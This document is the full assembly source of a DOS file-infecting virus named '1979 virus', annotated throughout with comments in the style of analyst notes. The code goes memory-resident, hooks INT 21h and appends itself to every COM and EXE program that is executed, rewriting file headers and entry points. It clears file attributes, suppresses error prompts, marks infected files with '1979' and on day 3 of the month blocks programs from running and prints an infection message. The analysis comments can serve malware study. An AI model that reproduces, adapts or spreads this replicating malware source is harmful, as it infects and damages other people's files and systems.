📄 dos下的1979 virus病毒的代码 .txt
;*************************************************
;* A Dos computer virus *
;* Name: 1979 virus *
;* Infect com or exe file in Dos system *
;* Completed in May 2 ,2000 *
;*************************************************
;*******************************************
;* Save Registers *
;*******************************************
; pushall: pushes AX, BX, CX, DX, SI, DI, BP, DS and ES, in that order.
; popall pops the same registers in the reverse order, so the two must
; always be used as a pair around the same stack depth.
; NOTE(review): in this listing the macro terminator shares the line of the
; final push; the text is reproduced exactly as the page shows it.
pushall macro
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es endm
;*******************************************
;* Restore Registers *
;*******************************************
; popall: pops ES, DS, BP, DI, SI, DX, CX, BX and AX, the exact reverse of
; the order pushall pushes them in.
popall macro
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
endm
;*******************************************
;* My Program Start *
;*******************************************
; One segment with a COM-style layout: every label below is assembled
; relative to offset 100h.
Code Segment
Assume CS:Code,DS:Code
Org 100h
; Start: stub that runs before the host program's own code.
;   1. obtains its own run-time address (call/pop) so data can be reached
;      wherever the body was appended;
;   2. for a COM host, copies SaveThreeBytes back to DS:100h-102h;
;   3. adds the current CS to the segment word of the ExecuteOrgFile slot;
;   4. skips installation when the first byte of the current INT 21h
;      handler is 90h.
; Assumes DS and ES still hold the values DOS passed at program start
; (both are saved here and popped again at StopLoading).
; Analyst note: ResidentPart begins with a NOP (90h); that byte is the
; "already resident" marker tested in step 4.
Start:
push ds
push es
call BaseAddr ; pushes the run-time offset of BaseAddr
BaseAddr:
pop si ; SI = run-time offset of BaseAddr; used as base for [label-BaseAddr][si]
cmp byte ptr cs:[ComOrExe-BaseAddr][si],EXEFILE
jz NotRestoreFileHeader ; EXE host: nothing is copied back to offset 100h
mov cx,word ptr cs:[SaveThreeBytes-BaseAddr][si]
mov ds:[100h],cx ; bytes 0-1 of the saved host start
mov cl,cs:[SaveThreeBytes+2-BaseAddr][si]
mov ds:[102h],cl ; byte 2 of the saved host start
NotRestoreFileHeader:
mov ax,cs
; ExecuteOrgFile+3 is the segment word of the 5-byte slot at ExecuteOrgFile;
; the stored value is relative and becomes absolute once CS is added.
add word ptr cs:[ExecuteOrgFile-BaseAddr+3][si],ax ; Set Original ExeFile Entr
y Point
xor ax,ax
mov ds,ax ; DS = 0000h: interrupt vector table
mov bx,ds:[21h*4] ; BX = offset of the current INT 21h handler
push ds:[21h*4+2]
pop ds ; DS = segment of the current INT 21h handler
cmp byte ptr [bx],90h
jz StopLoading ; handler already starts with NOP: do not install again
;**********************************************
;* Modify MCB And Make Room For The Program *
;**********************************************
; Shrinks the memory block that holds the running program by
; (MyVirusSize+15)/16 paragraphs and leaves in DX the segment that follows
; the shrunk block.
; Assumes ES is the PSP segment, so ES-1 is that block's memory control
; block; the word at offset 3 is read and rewritten as the block size in
; paragraphs. If the block is smaller than the amount needed, installation
; is abandoned.
; Analyst note: the size word is edited directly; no DOS memory-allocation
; call is made in this sequence.
mov dx,es
dec dx
mov ds,dx ; DS = ES-1
mov ax,ds:[3] ; AX = current size word
mov bx,(MyVirusSize+15)/16 ; paragraphs required, rounded up
cmp ax,bx
jb StopLoading
sub ax,bx
mov ds:[3],ax ; write back the reduced size
add dx,ax
inc dx ; DX = (ES-1) + new size + 1
;*******************************************
;* Load The Code Into Memory *
;*******************************************
; Copies MyVirusSize bytes, beginning at the run-time address of Start, to
; offset 0 of the segment held in DX.
push cs
pop ds ; source segment = CS
mov es,dx ; destination segment
mov bx,si ; Save Base Address
mov cx,MyVirusSize
sub si,BaseAddr-Start ; SI = run-time offset of Start
xor di,di ; destination offset 0
cld
rep movsb
;*******************************************
;* Modify Interrupt Vector Table *
;*******************************************
; Saves the current INT 21h vector into OldInt21h of the copied body, then
; asks DOS (AX=2521h) to point INT 21h at ResidentPart in that copy.
; The copy starts at offset 0 of ES while labels are assembled for Org 100h:
; the stores through ES therefore use "label-100h", and the segment handed
; to DOS is lowered by 10h paragraphs so that "offset ResidentPart" lands on
; the copied handler.
xor ax,ax
mov ds,ax ; DS = 0000h: interrupt vector table
push ds:[21h*4]
pop word ptr es:[OldInt21h-100h] ; saved offset
push ds:[21h*4+2]
pop word ptr es:[OldInt21h+2-100h] ; saved segment
mov ax,2521h ; DOS function 25h, AL=21h: set vector 21h to DS:DX
sub dx,10h
mov ds,dx
mov dx,offset ResidentPart
int 21h
;-----------------------------------------
; StopLoading: restores the ES and DS values pushed at Start.
StopLoading:
pop es
pop ds
; ExecuteOrgFile: five-byte slot. As assembled it is a RET followed by four
; zero bytes. WriteCode overwrites it with opcode 0EAh plus an offset word
; and a segment word before the body is written to a file, and Start adds
; the run-time CS to the segment word, so in a written copy control passes
; to the host's original entry point from here.
ExecuteOrgFile:
ret
dd 0
;*********************************************************
;* The Following Program Is Resident In Memory *
;*********************************************************
; ResidentPart: replacement INT 21h handler.
;   AH != 4Bh : jump straight to the saved handler (OldInt21h).
;   AH == 4Bh : read the date with INT 1Ah/AH=04h and compare DL with 03h.
;               equal     -> clear the screen, print Msg, return with IRET;
;                            the intercepted request is not passed to DOS.
;               otherwise -> continue at DoNoDamage.
; INT 1Ah/AH=04h is the BIOS real-time-clock date read; DL is taken here as
; the day of the month (BCD).
; Analyst note: the handler's first byte is NOP (90h), the value Start
; checks to recognise a resident copy.
ResidentPart:
nop
cmp ah,4bh
jz GoAhead
jmp cs:OldInt21h
GoAhead:
push ax
push cx
push dx ; three words saved; removed again by "add sp,06h" or the pops at DoNoDamage
mov ah,04h
int 1ah
cmp dl,03h
jnz DoNoDamage
;*******************************************
;* You Can Write Damage Code Here *
;*******************************************
mov ax,0600H ; INT 10h AH=06h, AL=0: clear the window CX..DX
mov bh,07h ; fill attribute 07h
xor cx,cx ; upper-left corner: row 0, column 0
mov dx,184fh ; lower-right corner: row 18h, column 4Fh
int 10h
mov ah,02H ; INT 10h AH=02h: set cursor position
xor bh,bh ; page 0
xor dx,dx ; row 0, column 0
int 10h
mov ax,1301h ; INT 10h AH=13h, AL=01h: write string at ES:BP
mov bx,0007h ; page 0, attribute 07h
mov cx,MsgLen
xor dx,dx
push cs
pop es
lea bp,Msg
int 10h
add sp,06h ; discard the AX/CX/DX words pushed at GoAhead
iret
;*********************************************
;* If It is Not The Right Day,Do No damage *
;*********************************************
; DoNoDamage: restores AX/CX/DX, saves every register with pushall, then
; classifies the file named by DS:DX.
; Assumes DS:DX is the zero-terminated program path supplied with the
; intercepted 4Bh request.
; The path is converted to upper case in place (the caller's buffer is
; modified) and its last four characters are compared with ComExtension.
; Result: ComOrExe = COMFILE (0) when they match, EXEFILE (1) otherwise;
; no other test of the name or of the file contents is made in this part.
DoNoDamage:
pop dx
pop cx
pop ax
;*********************************************
;* Begin To Infect File *
;*********************************************
pushall
mov si,dx
mov cx,0ffffh ; upper bound for the scan
UpperCaseString:
cmp byte ptr [si],0
jz Lab7 ; terminator reached
cmp byte ptr [si],‘a‘
jb Lab8
cmp byte ptr [si],‘z‘
ja Lab8
sub byte ptr [si],20h ; lower-case letter -> upper case
Lab8:
inc si
loop UpperCaseString
Lab7:
mov cs:ComOrExe,0
mov cx,4
sub si,4 ; SI = last four characters before the terminator
mov di,offset ComExtension
push cs
pop es
rep cmpsb
jz Lab9
inc cs:ComOrExe
Lab9:
;*********************************************************
;* Restore 21H Interrupt Vector To Use INT 21H Sevice *
;*********************************************************
; Writes the saved INT 21h vector (OldInt21h) back into the vector table so
; that the INT 21h calls which follow go to the previous handler and not to
; ResidentPart, then saves the INT 24h vector in OldInt24h and points
; INT 24h at NewInt24h, which is a bare IRET.
; DS (segment of the file name) is preserved around the table edits.
push ds
xor ax,ax
mov ds,ax ; DS = 0000h: interrupt vector table
push word ptr cs:[OldInt21h]
pop ds:[21h*4]
push word ptr cs:[OldInt21h+2]
pop ds:[21h*4+2]
;*******************************************
;* Hook 24H To Mask Error Process *
;*******************************************
push ds:[24h*4]
pop word ptr cs:[OldInt24h]
push ds:[24h*4+2]
pop word ptr cs:[OldInt24h+2]
mov ds:[24h*4],offset NewInt24h
mov ax,cs
mov ds:[24h*4+2],ax
pop ds
;*******************************************
;* Modify File Attribute *
;*******************************************
; Reads the file's attributes (AX=4300h) and keeps them on the stack. When
; the low attribute byte is non-zero the attributes are set to 0 (AX=4301h,
; CX=0). The file is then opened with AX=3D42h (access mode 2, read/write).
; A failed call leaves through EndInfection3 or EndInfection2.
; Analyst note: attribute bits such as read-only are cleared before the
; open and written back at EndInfection3.
mov ax,4300h
int 21h
jnc Lab6
jmp EndInfection3
Lab6:
push cx ; Remember To Pop It
or cl,cl
jz Lab1 ; no attribute bits set in CL: nothing to clear
xor cx,cx
mov ax,4301h
int 21h
jnc Lab1
jmp EndInfection2
;*******************************************
;* Open The File *
;*******************************************
Lab1:
mov ax,3d42h
int 21h
jnc Lab2
jmp EndInfection2
;*******************************************
;* Load File Header *
;*******************************************
; Lab2: reads the first 1Ch bytes of the file into a scratch buffer,
; computes the file size, reads the file's last four bytes and compares
; them with CheckString.
; The buffer is SS:BP with BP = SP-60h. SP itself is not lowered, so the
; buffer lies below the live stack rather than in reserved space.
; Analyst note: a file whose final four bytes equal CheckString ('1979') is
; skipped (jump to EndInfection1). Those trailing bytes are the on-disk
; marker this code uses.
Lab2:
mov bx,ax ; BX = file handle for all calls below
push ds ; Remember To Pop It
push dx ; Remember To Pop It
mov bp,sp
sub bp,60h
mov dx,bp
push ss
pop ds ; DS:DX = SS:BP, the scratch buffer
mov cx,1ch
mov ah,3fh ; read 1Ch bytes from the start of the file
int 21h
;*******************************************
;* Get The File Size *
;*******************************************
mov ax,4202h ; seek relative to end of file
mov cx,0ffffh
mov dx,-4 ; CX:DX = -4
int 21h
add ax,4
adc dx,0 ; DX:AX = position + 4 = file size
push ax
push dx
;*******************************************
;* Read Four Last Bytes Of The File *
;*******************************************
mov ah,3fh
mov cx,4
lea dx,[bp+1ch] ; stored directly after the 1Ch header bytes
int 21h
pop dx
pop ax ; DX:AX = file size again
;*******************************************
;* Check If The File Is Infected Or Not *
;*******************************************
push cs
pop es
lea si,[bp+1ch]
mov di,offset CheckString
mov cx,4
cld
rep cmpsb
jnz Lab4
jmp EndInfection1
;*******************************************
;* Save The First Three Bytes Of The File *
;*******************************************
; Lab4: copies the first three bytes of the header buffer into
; SaveThreeBytes (the bytes Start later puts back at 100h for a COM host)
; and branches on ComOrExe.
; COM path: the buffer's first three bytes become 0E9h followed by
; (low word of file size - 3), a near jump whose target is the current end
; of the file. DX=100h and AX=0 are the offset and segment words WriteCode
; stores into the ExecuteOrgFile slot.
; The file size in DX:AX is pushed here and popped again at POP_DX_AX.
Lab4:
mov cx,[bp]
mov word ptr cs:SaveThreeBytes,cx
mov cl,[bp+02h]
mov cs:SaveThreeBytes+2,cl
cmp cs:ComOrExe,EXEFILE
jz InfectExeFile
;*******************************************
;* Deal With ComFile *
;*******************************************
;PUSH_AX_DX:
push ax
push dx
mov byte ptr [bp],0e9h ; near JMP opcode
sub ax,3
mov [bp+1],ax ; displacement = file size - 3
mov dx,100h
xor ax,ax
jmp WriteCode
;*******************************************
;* Deal With ExeFile *
;*******************************************
; InfectExeFile: treats the 1Ch-byte buffer as an EXE header.
; The file size in DX:AX is rounded up to a multiple of 16 (SI keeps the
; number of padding bytes) and pushed for POP_DX_AX. The rounded size is
; divided by 16, the header word at +08h and a further 16 paragraphs are
; subtracted, and the result replaces the word at +16h; the word at +14h is
; set to 100h. Per the original comments these are the code segment and
; entry IP fields.
; On exit DX = old entry IP and AX = old code segment - new code segment,
; the values WriteCode stores into the ExecuteOrgFile slot.
InfectExeFile:
mov si,ax ; Compute How Many Bytes Needed To Align Para
and si,0fh
mov cx,16
sub cx,si
and cx,0fh ; 0..15 padding bytes
mov si,cx
add ax,cx
adc dx,0
;PUSH_AX_DX
push ax
push dx
mov cx,16
div cx ; AX = padded size in paragraphs
sub ax,[bp+08h]
sub ax,16 ; Compute New Code Segment
xchg [bp+16h],ax ; ExChange New Code Segment And Old Code Segment
mov dx,[bp+14h] ; Save Old Entry IP
mov word ptr [bp+14h],100h ; New IP=100h
sub ax,[bp+16h] ; Compute Difference Between Old Segment And New Segment
;*******************************************
;* Append The ExeFile To Align Para *
;*******************************************
push ax
mov cx,si
jcxz WriteCode ; no padding bytes: skips both the write and the "pop ax" below
mov ah,40h ; writes CX bytes from DS:DX (DS=SS, DX=old IP at this point)
int 21h
pop ax
;*******************************************
;* Write The Code Into The File *
;*******************************************
; WriteCode: stores a far jump into the ExecuteOrgFile slot of the resident
; copy (opcode 0EAh, offset word = DX, segment word = AX), writes
; MyVirusSize bytes from CS:100h to the file at the current file position,
; and then seeks back to offset 0 of the file.
; Expects DX and AX as prepared by the COM or EXE path that jumped here.
; Analyst note: the appended data is MyVirusSize bytes long and ends with
; the four bytes of CheckString, which is the last item in the data area.
WriteCode:
push cs
pop ds
mov byte ptr ExecuteOrgFile,0eah ; far JMP opcode
mov word ptr ExecuteOrgFile+1,dx ; offset word
mov word ptr ExecuteOrgFile+3,ax ; segment word (Start adds CS at run time)
mov dx,100h
mov cx,MyVirusSize
mov ah,40h
int 21h
;*******************************************
;* Modify The ExeFile Header *
;*******************************************
mov ax,4200h ; seek to absolute offset CX:DX = 0
xor cx,cx
xor dx,dx
int 21h
;-------------------------------------------
; POP_DX_AX: pops the size words pushed before WriteCode into DX:AX.
; For an EXE file MyVirusSize is added and the total is divided by 512:
; quotient + 1 goes to header word +04h and the remainder to header word
; +02h. For both file types the 1Ch-byte buffer at SS:BP is then written to
; the file; the preceding seek placed the file pointer at offset 0.
POP_DX_AX:
pop dx ; Pop To Balance The Stack
pop ax
;-------------------------------------------
cmp cs:ComOrExe,COMFILE
jz Lab10
add ax,MyVirusSize ; Compute How Many Sectors The File Occupied
adc dx,0
mov cx,512
div cx
inc ax
mov [bp+04h],ax ; quotient + 1
mov [bp+02h],dx ; remainder
Lab10:
push ss
pop ds
mov ah,40h
mov dx,bp ; DS:DX = SS:BP, the modified header buffer
mov cx,1ch
int 21h
;*******************************************
;* Infection Done *
;*******************************************
; Clean-up ladder; each entry point undoes one more step:
;   EndInfection1 : pops the DX/DS pair pushed at Lab2 (file name pointer)
;   EndInfection2 : pops the attribute word pushed at Lab6, closes handle BX
;   EndInfection3 : sets the file attributes from CX (AX=4301h)
; Afterwards INT 21h is pointed at ResidentPart again, the INT 24h vector is
; written back from OldInt24h, the registers saved by pushall are restored
; and control jumps to the saved INT 21h handler, which carries out the
; original 4Bh request.
EndInfection1:
pop dx
pop ds
EndInfection2:
pop cx
;*******************************************
;* Close The ExeFile *
;*******************************************
mov ah,3eh
int 21h
;*******************************************
;* Restore The File Attribute *
;*******************************************
EndInfection3:
mov ax,4301h
int 21h
;*********************************************
;* Let INT 21H Sevice Points To My Program *
;*********************************************
xor ax,ax
mov ds,ax ; DS = 0000h: interrupt vector table
mov ds:[21h*4],offset ResidentPart
push cs
pop ds:[21h*4+2]
push word ptr cs:[OldInt24h]
pop ds:[24h*4]
push word ptr cs:[OldInt24h] ; NOTE(review): same word as two lines above; it is stored into the segment slot
pop ds:[24h*4+2]
popall
jmp dword ptr cs:OldInt21h
; NewInt24h: INT 24h handler installed while the file is processed; returns
; immediately with IRET.
NewInt24h:
iret
;*******************************************
;* Data Area *
;*******************************************
; Data area. It lies inside the Start..$ range measured by MyVirusSize, so
; it is copied and written together with the code.
; OldInt21h: far pointer to the INT 21h handler that was active at install time.
OldInt21h dd ?
; OldInt24h: far pointer to the INT 24h handler, saved while a file is processed.
OldInt24h dd ?
; VirusCodeOffset: not referenced anywhere in this listing.
VirusCodeOffset dd ?
; ComOrExe: COMFILE (0) or EXEFILE (1); set by the extension check, read by Start.
ComOrExe db ?
; ComExtension: four characters compared with the end of the upper-cased file name.
ComExtension db ‘.COM‘
; Msg / MsgLen: text printed by the date-triggered branch of ResidentPart.
Msg db ‘Your Computer Is Infected With 1979 Virus‘,0dh,0ah
MsgLen = $ - Msg
; SaveThreeBytes: first three bytes of the host file, overwritten at Lab4.
; The initial values 1Eh, 06h, 0E8h match the first three opcode bytes of
; Start (push ds, push es, call).
SaveThreeBytes db 1eh,06h,0e8h
; CheckString: four-byte marker. It is the last data item before MyVirusSize
; is taken, so it forms the last four bytes of every written copy.
CheckString db ‘1979‘
;-----------------------------------------
CheckStringLenght = $ - CheckString
; MyVirusSize: byte count from Start to here; used for the memory request,
; the copy to memory and the write to the file.
MyVirusSize = $ - Start
COMFILE = 0
EXEFILE = 1
;-----------------------------------------
Code Ends
End Start